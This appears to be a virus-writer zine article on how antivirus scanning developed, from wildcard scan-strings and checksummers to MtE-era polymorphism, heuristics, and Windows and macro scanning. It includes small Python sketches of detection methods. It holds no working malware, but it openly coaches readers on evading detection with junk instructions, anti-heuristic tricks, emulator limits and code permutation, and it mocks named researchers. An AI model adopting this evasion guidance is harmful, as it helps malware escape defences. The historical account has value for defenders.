Wild-card scan-strings The situation gets a bit more complicated. Avers are forced to use one scan-string, for example only the fixed 16 bytes of the decryptor. Btw: some stupid avers chose scan-strings from the virus body - which is xored each time with another value, so they were able to catch only the samples they had, but nothing else :-) Well, let's think about a simple xor routine, quite fixed, yet with several variable bytes: the encryption constant (let's say one byte) and the starting offset. As these are not at the same place, the 16 bytes of the decryptor (pure example) are broken into 3 chunks of fixed bytes, the biggest of them, let's say, 6 bytes long. And avers have a problem: 6 bytes are really not enough for a scan-string, as they are not absolutely unique - part of such an ordinary loop can be found in other programs (see the discussion on scan-strings above). Oops, how to deal with it? (Think once again as an aver.) What would you do? Once you have some technology implemented, functional and tested, it is best to use it to the maximum. Scan-strings ... well, how about wildcards? That's it: all you need is a one-byte substitution like '?' in shell patterns. In this case you can still have a 16 bytes long scan-string with 3 variable bytes. It fits the requirements and all is as before - you have a scan-string to identify the virus, all is okay. The most important thing is that they were able to deal with it, but it took some time - and that gave viruses a chance to spread. This was the first implementation of wildcards in the history of antivirus scan-strings, but of course not the last change in scan-string methodology... Another problem that appears here is the decryptor vs. body dilemma. Once a virus is identified by its decryptor only, the scanner can't tell versions apart; moreover, it can't tell apart different viruses with the same (or roughly the same) decryptor.
Well, the cleaning problem can be solved by simple de-xoring in the cleaning routine - you must do that anyway if you want to clean an encrypted virus - and you can check the difference after decrypting. But this is an important change in methodology, as there is no exact identification before cleaning, and identification must be done once again during the cleaning process under different conditions (a cleaning routine, or the scanner executed once again, can do it). This problem still remains and I will return to it later on with MtE.
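The '?' wildcard described above is easy to picture as code. The following is only a sketch under my own assumptions: the textual pattern format ("??" for a variable byte, two hex digits otherwise) and the names parse_pattern and find_wildcard are invented for this example, and the pattern bytes are arbitrary, not taken from any real decryptor.

```python
from typing import List, Optional

Pattern = List[Optional[int]]  # None stands for the '?' wildcard


def parse_pattern(text: str) -> Pattern:
    """Turn 'AA BB ?? CC' into [0xAA, 0xBB, None, 0xCC]."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def find_wildcard(data: bytes, pattern: Pattern) -> int:
    """Return the first offset where the pattern matches, or -1.
    A None entry matches any single byte; all others must match exactly."""
    n = len(pattern)
    for i in range(len(data) - n + 1):
        if all(p is None or data[i + j] == p for j, p in enumerate(pattern)):
            return i
    return -1


if __name__ == "__main__":
    pat = parse_pattern("AA BB ?? CC")
    # Two buffers that differ only in the variable byte both match.
    print(find_wildcard(bytes.fromhex("00AABB11CC"), pat))
    print(find_wildcard(bytes.fromhex("00AABB77CC"), pat))
```

Note that the wildcard positions carry no information at all, so a 16-byte string with 3 wildcards is only as selective as 13 fixed bytes. That is the false-positive pressure mentioned in the scan-string discussion.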
Variabilizing encryption Avers handled encryption with wild-cards, you have to think about something new again, unless you want to be caught in a days. Once virus have some simple encryptor, you can improove it a bit: you can increase variability not to be handled by '?' wildcards by inserting of nop's or any simple junk instructions. Then your decryption instructions are not at fixed distances and simple wildcards will but be able to handle them. For example, if you have two fixed instructions together, a scan-string can be choosed from both of them. But if you insert 1-5 nops, scan-string with '?' will not deal with it (unless there are 5 scan-strings ;-) Simple, and it can't be handled by current methods.
More wild-cards How can avers find such decryptors? They implemented another type of wildcard for it - '*', standing for a variable number of arbitrary bytes. It took some additional work but it was handled. It depends on the implementation how many arbitrary bytes are allowed - whether the number is fixed, or limits are included in the scan-string, or whatever. Scan-strings came to differ from antivirus to antivirus. They were still able to handle all viruses with scan-strings, but there came to be a large number of strings, which slows down the scanning itself (today it looks like a kids' game, but viruses were at a much lower level than now, too). Some antiviruses started using a hierarchy of strings, methods of strings and substrings (a smaller set for generic identification and, if found, a more detailed set), presorting of strings into radix tables, etc. It varies, but all of them follow the basic principles and fulfil the requirements. An interesting idea for speeding up the scanning process is the single-point scan-string, checked at a fixed relative offset to some important file position (e.g. entry point, file start or file end). Such a string can be shorter, as it is checked only once at a fixed offset (compared to strings checked across the whole loaded part of the file), which decreases the possibility of false alarms (and saves memory as well). It is much faster to scan for such strings, and it is easier to distinguish between versions. If a single-point string is well chosen it can be only 4-6 bytes long, compared to 12-18 bytes for a regular string.
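Both ideas from this part, the '*' wildcard with a gap limit and the single-point scan-string, can be sketched in a few lines. This is an illustration under assumptions of mine, not a description of any real product: the pattern is given as a list of fixed chunks with one shared max_gap limit, the function names are hypothetical, and the bytes are arbitrary demo values.

```python
from typing import List


def _match_rest(data: bytes, chunks: List[bytes], pos: int, max_gap: int) -> bool:
    """True if the remaining chunks follow in order from pos, each one
    starting at most max_gap arbitrary bytes after the previous chunk."""
    if not chunks:
        return True
    head, rest = chunks[0], chunks[1:]
    for gap in range(max_gap + 1):
        p = pos + gap
        if data[p:p + len(head)] == head and _match_rest(
                data, rest, p + len(head), max_gap):
            return True
    return False


def find_gapped(data: bytes, chunks: List[bytes], max_gap: int) -> int:
    """'*'-style search: return the offset of the first chunk of a full
    match, or -1 if the chunks never appear in order within the gap limit."""
    first, rest = chunks[0], chunks[1:]
    pos = data.find(first)
    while pos != -1:
        if _match_rest(data, rest, pos + len(first), max_gap):
            return pos
        pos = data.find(first, pos + 1)
    return -1


def single_point(data: bytes, anchor: int, offset: int, sig: bytes) -> bool:
    """Single-point check: compare sig at exactly anchor + offset, where
    anchor is e.g. the entry point, the file start or the file end."""
    p = anchor + offset
    return p >= 0 and data[p:p + len(sig)] == sig


if __name__ == "__main__":
    buf = b"\x00\x00\xaa\xbb\x11\x22\x33\xcc\xdd\x00"
    print(find_gapped(buf, [b"\xaa\xbb", b"\xcc\xdd"], max_gap=5))
    print(single_point(buf, anchor=2, offset=5, sig=b"\xcc\xdd"))
```

The gapped search has to try every allowed gap for every chunk, so its cost grows with max_gap and the number of strings, while the single-point check is one comparison per string. That difference is the speed argument made above.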
Way from variable encryption to metamorphism Once you are modifing a decryptor with some trivial junk instructions (there is no reason to put there some harder one, as all was needed to beat fixed strings, and nops can do that as well as other instructions) you can do even something more. Scan string is fixed sequence of bytes, but if you change and indexing register, it becomes different sequence of bytes. Decryptors started to change in every infection, changine indexing register, decrypting instruction, loop method, etc. Encryption scheme is pretty visible, however it slightly increases byte-level variability up to level when even wild-card scan-strings can't be used at all, or they can't be used at suitable reliability. This is something we can call variable encryptors or metamorphism - everyone call it in different way, avers clasify it even as a low polymorphical engines in order to show how clever they are. However, now there were no matter of junk instructions (are there or not) once valueable bytes of decryptor instructions can't be checked. It was presented in many forms in viruses and it requests new answer from avers.
Algorithmic scanners is the name of the technology they presented. As attempts with masks in scan-strings (to filter out the variable part of a byte) didn't give suitable results, something new had to be found. Scanners started to use (in parallel) short routines that decide whether a piece of code is a known decryptor or not. Such a routine checks for some code sequences or forms, and if the code fits the hard-coded requirements, the file is reported as infected. Usually they had as many algorithmic routines as there were decryptors to recognize. As the encryptors they check for follow really easy rules, infection can be tested with satisfactory results. Simple encrypted viruses were checked this way. But most top avirs do not use this for trivial virii now (some do, e.g. Avast!, which always (ok, usually) rates in VB's 100% award group - but look at the tests - it can't exactly identify even simply encrypted viruses). Most top avirs use some kind of tracing (i.e. emulation), because it is required today to handle many complicated viruses, in the form of a generic decryptor - a routine which is able to decrypt simply encrypted viruses (or more complicated ones, it again depends on the implementation).
Inoculating
This was another interesting thing antiviruses offered in the old times - maybe some of you remember, for example, TNT Antivirus (it is gone), which did it. The functionality is simple - viruses usually use some mark to tag files that are already infected, so as not to infect them again (all this is nearly the same for boots/MBRs). You all use some variable set in the file, or part of the virus body (some bytes) found in the file, or a changed file time/date. By inoculating, those attributes are set and the virus will not infect the file again. Sounds nice, but it does not work in general :) At that time there were not as many viruses, but it became impossible anyway - you simply can't inoculate files against all viruses. If two different viruses check the seconds field of the modification time and set it to two different values, you can't cover both of them. Yes, viruses don't test files only for their flags, but for some limits too. But some of these you can't fake - for example some values in the exe header, or overlays (the program might stop working). These are the reasons why it can't be used for a large number of viruses or for all viruses - it can be done for one or a small number of viruses. Moreover, nobody spends a lot of time on the analysis of viruses today - most of them are analysed in a short time, and you have to know a virus completely to do inoculation, otherwise it may damage the inoculated files. In other words, I don't think there is any reason to care about inoculation today.
"The Final solution"
This is what some av companies called their antivirus systems some time ago. They presented "the final antivirus that can deal with every virus without knowing it". Sounds good, doesn't it? And it is more or less true. Do you have any idea what it is? Well, checksumming, that's it. The idea is simple, and it works in many cases: all files that can be infected are checksummed (some kind of crc is calculated), plus the file size, some bytes from the header, the entry point, etc. are backed up. Then, if a virus infects some file (it must not be stealth), a change in length or contents is detected. The first checksummers were really slow, as they calculated the crc of the whole file, and it takes some time to load it. But this can be sped up greatly by checksumming only the important areas (header, entry point, file end) with the same success. Once a change is detected, the file can be repaired by trying the available repair schemes (typically there are only a few ways in which viruses insert themselves into a file), and if the result of one of them matches the original crc-s, the file is successfully repaired. Sounds nice, but it has several problems (lucky, lucky). First, it can't even detect stealth viruses while they are active. But if they are not in memory, checksummers are still of value. Another big problem is lazy users - most of them use (and download) an antivirus only when they suspect something or are already infected - and there is no sense in making a crc snapshot of infected files ;) And finally, there are still viruses (and this is how you can avoid a checksummer's success) that do not infect files in a standard way, or modify some bytes deep in the host code, or do whatever else doesn't match the implemented schemes.
For these reasons checksummers didn't have big success and can't be a really big weapon against viruses globally, but they are still usable in many cases, and in combination with a heuristic cleaner they can be even more efficient. There are still antiviruses that use checksumming, and they can reach high efficiency in detecting and cleaning.
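The checksummer idea can be sketched in a few lines of Python. This is only an illustration under assumptions: the 64-byte `AREA`, the field names and the single "appended body plus patched header" repair scheme are invented here and are not taken from any particular product.

```python
import zlib

AREA = 64  # bytes checksummed around each important position (assumed value)

def snapshot(data, entry_offset):
    """Record the file size plus CRC32 of header, entry-point area and file end."""
    return {
        "size": len(data),
        "header": zlib.crc32(data[:AREA]),
        "entry": zlib.crc32(data[entry_offset:entry_offset + AREA]),
        "tail": zlib.crc32(data[-AREA:]),
    }

def changed_fields(old, data, entry_offset):
    """Return the names of snapshot fields that no longer match."""
    new = snapshot(data, entry_offset)
    return sorted(name for name in old if old[name] != new[name])

def try_repair_appended(data, saved_header, old, entry_offset):
    """One hypothetical repair scheme: cut the file back to its old size,
    restore the backed-up header bytes, and accept the result only if it
    matches the stored snapshot."""
    candidate = saved_header + data[len(saved_header):old["size"]]
    return candidate if snapshot(candidate, entry_offset) == old else None

# Toy data: a "clean" file and a copy with a patched start and appended bytes
clean = bytes(range(256)) * 4
snap, saved = snapshot(clean, 0x100), clean[:AREA]
modified = b"\xE9\x00\x04" + clean[3:] + b"APPENDED" * 10
print(changed_fields(snap, modified, 0x100))
print(try_repair_appended(modified, saved, snap, 0x100) == clean)
```

Checking the repaired candidate against the stored snapshot is the important part: a repair scheme that does not reproduce the original crc-s is simply rejected, so a wrong guess cannot silently damage the file.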
MtE breakthrough - polymorphism Dark Avenger, world most famouse virus writer from Bulgaria, become famouse mostly because of a 3kB long object file he released. It is known as MtE 0.9 beta (short name of Self-Mutating Engine) which made many avers not to sleep for many nights. This smashing breakthrought was many times plagiated by some virus coders, but I think it was never (or nearly never) as good as MtE. What it was? Imagine situation of scanners before: all were based on scan-strings with wildcards, at most some easy checking routines (usualy not). But Dark Avenger informed the world in FidoNet message-group (I don't think that some of current guys on scene remembers fido) about his library that that can encrypt virus in 4.2 bilion different ways (4G you should understand) that can beat all scanners. Moreover it was real. MtE started new era called polymorphism. It was able to generate a decryptor containing many instructions withou visible schematics in it. Random maps of registers, several accessing modes, fake codeflow alternatives, all was so unusual. Only schematic thing was end of loop - usualy dec/dec/jnz sequence, as avers decided there is always this sequence. Most of them thinks it also now because Bontchev said so, but there isn't :) I got this result on thousands of generated samples I made - with some probability it creates other loop instructions sequence. MtE 0.9 was distributes with sample virus - non-resident com/exe infector, which was many time patched by lamers that are not able to write its own virus (with MtE library or not) and many very-simmilar viruses with MtE appears. A usual name of sample virus is MtE:Dedicated, because it contains a string: "This virus is dedicated to Sarah Gordon who wanted to have a virus named after her." (hope I remember it right). 
Here we have - famouse and hated (and foolish) Sarah - even guys from av scene doesn't like her theoretical stuff, but they can't say it clearly as we can :) She became famouse (except it is a woman ;-) due to her investigation about virus writers and their origins. Funny but unusable and she sure hopes it is forgotten now ;) Well, but back to MtE: Also library MtE 1.0 appears in the world, but it was nearly forgotten as it doesn't bring new features, and most viruses are using original version 0.9.
Algorithmic scanners once again
MtE went beyond the limits of the old antiviruses and presented a completely new idea they had to fight with.
Some unreliable detectors appeared that checked for secondary flags, like entry points, or some code sequence, or file tagging, but they weren't quite functional. It took a rather long time (months!) until a good detector was written and built into antiviruses. Partly this was because at that time it took many days for a virus to get from country to country - unlike today. Regardless of that, there was a big competition between antiviruses to catch all samples of MtE. Many independent tests were made (as never before or after), testing antiviruses on thousands of samples to see whether they could find all MtE samples. It took all antiviruses a lot of time to reach a 100% hit-rate. Again the question of exact detection appeared. CARO recommendations suggested the solution (and some antiviruses followed it, like TBAV at that time) that the polymorphic library should be part of the virus name, separated by a colon. For example MtE:Pogue.A - the rest of the hierarchical virus name should be dot-separated as before to show versions/revisions. However, it was quite difficult for avers just to decide whether there was an MtE encryptor at all; they weren't able to get under the generated encryptor. How did they detect MtE? Well, algorithmic scanners were the solution once again. But without a visible scheme it wasn't so easy. Most antiviruses used (and mostly still use) an acceptance disassembler. The idea is simple: MtE generates only some instructions, and the loop is always terminated by dec/dec/jnz (well, not always, but no matter now). All you need to know is whether a given instruction can be generated by MtE, and the size of the instruction (to know where the next instruction is). If a jnz is found, you check whether it jumps backward and whether there are two dec-s before it. And to solve conditional paths - just try to pass both of them using recursion. If the test is passed and a backward jnz is found, an MtE virus is reported.
Such a test is fast enough, hits all infected samples and has no (or really, really few) false positives. And it can be as small as a bit more than 300 bytes, as illustrated in TBAV. That's why some antiviruses can't report exactly which virus is encrypted by a polymorphic library: they (usually) only check whether the decryptor could have been generated by the corresponding poly engine. This technology is intended as non-destructive analysis (the code does not have to be loaded again) in comparison with emulation.
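The acceptance test described above can be sketched as a toy in Python. Note the assumptions: the table of "acceptable" opcodes below is a tiny invented subset of 16-bit x86 (nop, inc/dec reg, mov reg,imm16, short jz/jnz/jmp), not the real MtE instruction set, and real detectors certainly differ in detail. It only shows the three ingredients from the text: an instruction-length table, recursion over both branches of a conditional jump, and the final check for a backward jnz preceded by two dec-s.

```python
def length_of(op):
    """Length of an accepted instruction, or None if it is not in the toy table."""
    if op == 0x90 or 0x40 <= op <= 0x4F:      # nop, inc r16 / dec r16
        return 1
    if op in (0x74, 0x75, 0xEB):              # jz / jnz / jmp with rel8
        return 2
    if 0xB8 <= op <= 0xBF:                    # mov r16, imm16
        return 3
    return None

def is_dec(op):
    return op is not None and 0x48 <= op <= 0x4F

def rel8(byte):
    """Interpret a byte as a signed 8-bit displacement."""
    return byte - 256 if byte > 127 else byte

def accepts(code, pos=0, prev=(None, None), depth=0):
    """True if some path from pos ends in dec/dec/backward-jnz
    using only instructions from the toy table."""
    if depth > 32:
        return False
    while 0 <= pos < len(code):
        op = code[pos]
        size = length_of(op)
        if size is None or pos + size > len(code):
            return False                      # instruction not acceptable
        nxt = pos + size
        if op in (0x74, 0x75, 0xEB):
            target = nxt + rel8(code[pos + 1])
            if op == 0x75 and target < pos:   # backward jnz: the loop end
                return is_dec(prev[0]) and is_dec(prev[1])
            if op == 0xEB:                    # unconditional jump
                if target <= pos:
                    return False              # toy: refuse backward jmp
                pos, prev = target, (None, None)
                continue
            # forward conditional jump: try the taken path, then fall through
            if target > pos and accepts(code, target, (None, None), depth + 1):
                return True
        prev = (prev[1], op)
        pos = nxt
    return False

# mov cx,10h / nop / dec cx / dec cx / jnz back to the nop
print(accepts(bytes.fromhex("B9100090494975FB")))
```

Because the walker never executes anything and only moves forward, it is fast and cannot hang, which matches the non-destructive character of the method; the price is that it says nothing about what is hidden behind the decryptor.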
Plagiating MtE - polymorphic era Success of MtE was never replicated. At first I think none of routines were as good as MtE, they were different - as usualy noone understoods Darkie's code. But to be as successful as MtE it is not enought to write a good polymorphic engine - this is something I want you to understand - as current avir technologies can handle polymopric viruses mostly without problems. To be as successful as MtE one have to make simmilar breaktrough - something that is incompatible with current thinking of antivirus guys. When MtE kicks all the avers pretty hard, a many virus coders started to write simmilar engines (as once MtE was already detectable). First one I remember was TPE - Trident Polymorphic Engine (released by Trident group). There was a big fear from AV side of it because all they sill remembers MtE's fear. However, TPE wasn't as successful as MtE in world becase most of viruses weren't spread enought to be important. TPE technology was a bit different than MtE's - it uses several schemes of main encryptor, picking one of them plus some number of introduction schemes placed before encryption loop. It was rather schematic, but there were many schemes so it wasn't visible for the first view. Hovever, some detecting routines used simmilar algorithm as for MtE, some detected each scheme in encryptor and checks it. In general, TPE as handled much easier by avers - as they knew how to deal with it already. I will not make big differences between each polymorphical engine as they are principialy unimportant. Some engines were really easy piece of cake for avers, some made them a lot of problems. Some noticeable poly engines usualy only reach some limits of antiviruses but never goes above them - thats why other poly engines weren't so successful - because MtE settuped a rather high limit. I can show you it on SMEG - all why it was so dangerouse for avers is because it can generate a really long decryptors. 
Well, a big fear of avers can be, if many polymorphical viruses (or engines) appears in a short time, each of them non-trivial (on some of limits of scanners), it will be really hard to implement specialised scanning routines for all of them, if they are reported in-wild.
Heuristics Well, this is a another big chapter, developed together with other technologies. A time ago, heuristic was only a experiment how one can catch unknown virii. But wasn't quite relieable, widely it was introduced by TBAV (sure everyone knows). As we have completely dedicated article to this topic I will not describe it here - only to describe its reasons and influence in history. Finally, with more and more viruses comming each month, some avers tried to find out something that can detect even those they are not able to add so fast - to detect unknown viruses, in general. In fact it has same proposal as checksumming already mentioned. For a long time heuristics was some kind of avers alchemy to improove their hit-rates. It was magic that everyone admire (avers, virus-writes, gurus, coders and regular lamers), but noone trust. Funny, isn't it? First for wide public, surely not best, and mostly fooled by viruswriters is TBAV. TBAV puts all its power into fast heuristics but it has primary weak point - it was passive instead of active (disassembling instead of emulation) and it wasn't able to go through encryptors. Another bad thing for TBAV were displayed flags so anyone can see what internal flags were found on given file. And using documentation you can find out what TBAV suspects on your virus - and you can tune up not to be detected by TBAV easily. Soon many viruses started to be anti-tbav that means not detected by tbav's heuristic by default (today it is some sort of standard). It is too bad for heuristic - as it is designed to catch new viruses, but if they are all designed not to be detected by such a heuristic, there is no way to do so. TBAV's heuristic finds its death in these things. TBAV (followed by some plagiats) uses, as I already mentioned, a passive method or disassembly (in other words) that analyses code (instructions) and detects some suspecting schemas - like setting registers and calling interrupts, etc. 
There were a lot of flags (nearly for every letter of alphabet) for many things and they are detected in different ways. But it was rather easy to fool, simply if it looks for mov ah,40 int 21, all you need is to do mov ah, 3f inc ah int 21 and TBAV will not complain. For this reason anviruses that still uses passive analyzis as main weapon combines it with register emulation (tbav as well) that can (a bit) keep a track of values in registers. When int 21 is found, for example, a 10 instructions before are likely analyzed to find out values of registers. It works in many cases and do not work in many cases as well. Most funny thing was decryptor detection. It didn't work in many cases, and then tbav runs to detect instructions from encrypted area - and usualy it founds many suspected instructions there of course. Well, I'm not here to judge TBAV or other avir, for this proposal we have another article. Another more powerful heuristic is presented by AVP (but it is usualy hidden as avp displays regulary detected viruses at first), by DrWeb and Nod-iCE. They are using active heuristics (emulating as much as possible) and are able to detect much more suspected activities. Also, you don't see any flags there, so it is harder to fool them. But AVP's heurstic as well as Dr.Solomon's are setuped to be less-sensitive as they can detect plenty of viruses by scan-strings and they do not need to be as successful on uknown viruses as others. For this reason of course they have less false-positives as well (our experiments some time ago shows that hit-rate of Dr.Solomon's heuristic for example is round about 70%). Active heuristic (emulation) is destructive to code, as it emulates as much as possible, and it must be trickily combined with scanning. But it simplifies scanning as emulation can simply go through decryptors and then av can detect virus exactly as it is already in decrypted state. 
For this reason it is also called a generic decryptor in some antiviruses - if they use emulation only for this. After years of being unsure, heuristics has finally become a standard, and as Nod-iCE and DrWeb show, it can be really reliable. This is what emulation gives us. However, top antiviruses today use a combination of both methods. The weak point of passive heuristics (or disassembly) is the disassembly itself: it is difficult to find out the values of registers even in simple cases. Of course it depends on the implementation of the heuristic. Also, any encryption, or data-dependent or highly structured code can't be understood by a disassembly-based heuristic scanner. As a heuristic scanner looks for the typical instruction structure of viruses (searching for executable files, accessing and modifying them, becoming resident, etc.), do these things in some tricky way, not clearly and visibly. To fool emulation is much more difficult. Emulation typically executes the code of the virus as on a regular computer, establishing some circumstances and testing whether the code performs the usual virii activity. First, emulators are limited by definition - they are much slower than a regular machine, so long decryptors or routines that jump from one to another for a long time are aborted on a timeout - because the heuristic can't hang for a long time on one file. Then there are limits of the processor - only one type of processor can be emulated (more or less) perfectly. You can test whether the processor works the way it should: undocumented (but mostly unknown!) instructions, maybe some badly implemented instructions in their emulator (they are hard to find). However, it is only a couple of minutes of work for them to implement another instruction. But there are other limits too - the machine can't be emulated completely: the entire file can't be loaded (imagine loading a 500k exe file), the virtual machine doesn't work like it should - many interrupts may not work, things done by other parts of the system are not completely emulated either, i/o ports usually don't work (maybe some of the easiest are emulated, but not all of them), etc. The hardest thing for avers should be hitting the limits of the emulator, because they can't extend these limits every time: memory size, file loading, emulation speed.
Cracking Windows
Have you ever cracked a window? Just take a rock and throw it at the window. Easy, isn't it? All right, I'm not going to write about that, but about the real Windows - Microsoft's revenge on the rest of the world. Some time ago, with Win3.x, the world was divided between those who didn't like Windows (or even hated it) and those who liked it (which of them actually used it doesn't matter now). It was similar on the virus scene - most coders stayed at the DOS level for three main reasons: there was no need to write for Win as DOS was good enough, Windows was less documented, and finally many coders weren't able to code anything for Windows. Now things have changed a bit. Microsoft rocked the world with Windows 9x and turned everything PE-ized. Well, history repeats:
Windows 3.xx
The first Windows viruses were simple examples. The file format is a bit different - NE has extra fields, and circumstances in protected mode are different, but interrupts still work and things are more or less similar. So the first viruses were simple non-resident infectors. All avers needed to do was to implement scanning of the secondary entry point in NE. The virus was pretty visible, and a simple scan-string could be used. Later I remember big rumours about the first resident viruses in Windows. Many discussions started about whether viruses would stay under DOS or move to Windows. Today I think you all know what's true. But Windows is more complicated - there are more files that can be targets of infection, DLLs for example, and more things to infect in them. An interesting example was a virus that infects exported labels in a DLL: for example, an exported function XyzA was infected instead of the regular entry point. What must a scanner search for in this case? It has to go through all the exports! And there can be a lot of them, which rapidly decreases scanning speed. It is still an interesting idea. The only way avers handled it was by scanning the file end (which they usually do) for a string, and oops, the virus is there. But if things are more complicated to scan - some encryption, for example, or a body not located at some easily determinable place - it will be really bad for avers (they'll have to emulate code at every export label). Memory scanning is also not possible in the way it used to be for scanners. Under Windows 3.xx one can do what he wants - for this reason some viruses go to Ring 0, for example, but an antivirus can do the same to scan all the memory. But there is of course more memory to scan and it is rather slow. Today memory scanning in Windows is not that preferred.
Instead, resident scanners are used more widely, as they are now more consistent with the operating system (Win 9x) and there is not as big a hunt for memory as there was under DOS with Bill's world-famous 640k limit.
Windows 95/98
was a real Microsoft's smash. Some of users tried to ignore it, but time shows that Win95 changed the world - everyone start using it. Today virus writers must to focus on this platform, because there are lot of users. First tries for Windows 95 started at the time when only beta version was available. VLAD promptly prepared first virus for Win95, and they spend a lot of time with exploring the details - it was Bizatch (by Quantum/VLAD). But their virus did not work under final Win95. The reason why it didn't work is simple - may be some of you know book called "Inside Windows 95". A lot of userful things regarding windows internals is published there - it was also published before Win95 was released. For this reasons, programmers at Microsft got order to changed some important things in Win95 to be incompatible with the book already written (to deny access to internal things). Also magic numbers of imports were changed there, and imported label for example FileOpenA was no longer correctly linked at load time. Another interesting is a Bizatch story. Because avers has access to beta version of this virus (well there are some guys at virus scene that can trade internal things with avers without remorse) and they firstly assumed it is not functional. Of course, a real version they also got later on. But they named it Boza (well, all-aroundthe-world-hated Vesselin Bontchev (even avers hate him because of his ego)) - because he doesn't want to please a virus author. But - CARO rules (setuped by Vesselin!) says that if virus calls itself in some way, this name should be choosed primary. And Bizatch is: "Please note: name of this virus is [Bizatch] written by Quantum of VLAD". Instead of it Vesselin find a name Boza (from bulgarian alcoholic drink) - with no connection to original virus (this is the worst case suggested by CARO naming rules). Everyone at the scene was angry about avers, of course. Forget about flame wars now. Scanning - that what is interesting. 
Windows 95 was 32-bit, but the format it used - PE - had been in use for some time. Windows NT 3.x used it, as did the win32s extension to the 3.xx versions. What can one expect from a 32-bit file format? All offsets and pointers are 32-bit, of course. Other principles are more or less similar to NE - there is a primary entry point, several segments can be defined, there are many exported functions (for 32-bit DLLs), etc. But things are the same as before - to scan for a simple (non-encrypted) virus, all that is needed is to load the entry point of the file and scan for some bytes - everything is as before, only a PE loader is needed. Now let's see what weapons avers have against Windows viruses. First, a look at the old scanning methods: scan-string scanning can be used in the same way as before. Checksummers may also do their work, but PE (or NE) schemes must be implemented in them. The hardest part is heuristics and generic decryption (well, or both at the same time). For PE a 32-bit emulator must be programmed, and at the present time I don't know of any antivirus that has it fully functional. DrWeb is preparing it, but not yet... For this reason current heuristic engines use only passive heuristics (some kind of disassembly) for 32-bit PE. And that's why there are no generic decryptors, and each polymorphic virus for Win9x must be handled separately. But all Win9x viruses can be detected by their decryptor, and there are not many polymorphic viruses for Win9x that are different in principle, so at the present time generic decryption is not as urgent as it was for DOS.
Macro world
Microsoft offers many virus-friendly environments. It has been this way through all of history, and another powerful macro system became a new platform for viruses. Yeah, MS Office did it again. The first attempts to write a virus for Word were something like jokes. Most people hesitated to call it a virus; "self-spreading macro" was the most obvious definition. But today everyone calls it a virus, and there are really many of them now. One may guess that even more macro viruses (or other script viruses) appear monthly than "regular" viruses. Scanners have their life more complicated once again. Microsoft keeps the "structured document format" documentation to themselves, claiming: it is an internal format, you don't need to know about it, just use our programming interface. However, Microsoft's interface doesn't allow enough to scan for viruses in the macro area. Avers had to find out the document format by themselves. Many of them weren't able to do it for a long time (until third-party documentation appeared), because this format is fragmented on up to two levels, and moreover the fragmentation definition can be fragmented as well. Scanning macros was so unusual for avers that some antiviruses scanned whole files (funny, since the virus body being scanned for can be fragmented too - and they are not able to catch fragmented pieces), and even specialized antiviruses appeared and were rather successful on the market - like F-Win or HMVS. From the virus-maker's point of view nothing more is needed than to understand macro commands. But avers have to do much more. Microsoft's document format can be encapsulated in other formats and all of them need to be scanned (like MS Exchange's folders, etc). Once they have reading routines to access the macro area, regular scan-strings can be used. Some of the first macro scanners just scanned for names of macros, but that is outdated today. Scan-strings are really reliable. However, for polymorphic macro viruses things are more complicated. For these reasons and again - to catch new viruses appearing every day - heuristic scanners appeared. They are based on disassembly of macro code (accessing the macro area and walking through instructions, finding unusual and/or suspicious instructions or combinations). For macros, heuristics is much more reliable, as the instruction set is much more limited, there are no registers or widely accessible memory, etc.
Closing Congratulation if you read all the things above. Hope it was not boring, and it helps you some way. The main thing I tried to present here is you have to think, not plagiating other viruses, not doing all viruses same way one right like another - but to show you that you have to understand scanning methods in order to write better viruses. Because the more your virus complicates life to the avers, the more it is successful. If you can write something that completly beats currently used methods, thats the best. I can give an example of slovak viruses like Dark Paranoid, or TMC:Level_42, or let's start with german virus Tremor: its nothing unusual except after it was detected by avers and added into scanners - it permutates (changed usual schema) and old samples weren't caught by antiviruses again. Or Dark Paranoid: as they weak point of stealth viruses is their presence in memory (and they can be detected there easily), Dark Paranoid is encrypted memory, having polymorphical handler of single-step interrupt to encrypt only one instruction beeing executed. In this way Dark Paranoid can't be caught in memory by simple scan-string, it can't be caught in files once it is stealth. Or TMC, that stands for Tiny Mutation Compiler (well, linker actually) is able to permutates its own instructions placing them in random order, connecting them with jumps and contitional jums and finally relocates all memory access instructions and jumps. Scan string for it can't be choosed as it can be broken after every single instruction. Moreover, in files it has only permutator and linker stored with data used to constructuct and link whole body (not a instructions) - and it takes really long even to emulation heuristic to construct whole virus and to test it. These are examples of non-traditional thinking. 
Find your own way, break the limits of current point of view this way you can efectively beat avers - that they affraids most of all: they can't change principles of their scanners every day. Think of it... flush
In this article I would like to introduce my own view of the scanning technologies for macros used in the most common antiviruses.
Structure of WB6/VBA
The first thing you have to understand is how a macro is stored in a file. This is probably the most important reason why scanning is done the way it is done. So let's start. I will assume you know something about VBA (Visual Basic for Applications), which is the most common language used for macros. I would like to focus on VBA, because it is more common than WB6 (Word Basic 6). A VBA project is stored in its own folder (you can easily take a look at it by using dfview - supplied with DevStudio). Each macro is stored in a stream with a somewhat complex structure. Before a macro is written to the file it is compiled by the built-in compiler to something like a stack-machine language. So a = b + c is something like this:

    push b    ; put b to stack
    push c    ; put c to stack
    add       ; pop b, c and put their sum to stack
    pop a     ; pop value and set a to it
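If the stack-machine idea is new to you, the four steps for a = b + c can be run on a tiny interpreter. This is a sketch in Python with invented operation names (`push`, `add`, `pop`); the real compiled VBA code uses its own opcodes and refers to names through the dictionary, which is not modelled here.

```python
def run(program, variables):
    """Execute a list of (operation, argument...) tuples on a value stack."""
    stack = []
    for op, *args in program:
        if op == "push":                 # put the variable's value on the stack
            stack.append(variables[args[0]])
        elif op == "add":                # pop two values, push their sum
            right = stack.pop()
            left = stack.pop()
            stack.append(left + right)
        elif op == "pop":                # pop a value and store it in a variable
            variables[args[0]] = stack.pop()
        else:
            raise ValueError("unknown operation: " + op)
    return variables

# a = b + c
program = [("push", "b"), ("push", "c"), ("add",), ("pop", "a")]
print(run(program, {"b": 2, "c": 3})["a"])
```

Notice that the program itself never contains the values, only references to names, which is why a scanner that skips the name table still sees the same instruction structure.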
Variables and function names are usually located in a dictionary, so it is a bit difficult to find them. The code contains just pointers or indexes. Moreover, the dictionary is not in the macro file, so if an avir is lazy (and many are) it just skips them. Another important thing is that jumps and calls are not linked in the file, so it is a bit difficult to trace code flow. Another approach to scanning VBA is to decode the "source" supplied with the macro. In this case the avir has the full source of the code (with all names and so on), so it is enough to skip some headers or a bit more and CRC it. WB6 is much simpler in structure. Its code is stored in tokens (?), where each token has an exact meaning. For example space, +, -, SomeFunction, number, variable, and so on. So it is rather difficult to write an emulator of this language. I don't like to waste time with this, so just an example (the same case as I used for VBA):

    variable "a"
